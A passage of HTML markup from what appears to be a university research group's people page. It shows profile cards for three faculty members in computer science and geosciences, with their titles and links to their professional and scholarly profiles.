14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-cropped-patterson-e1697143515399.jpg\" class=\"wp-image-1679 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\" class=\"wp-image-1681 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-973 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\" class=\"wp-image-1682 style-973-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-974 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-975 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-976 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-977 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a 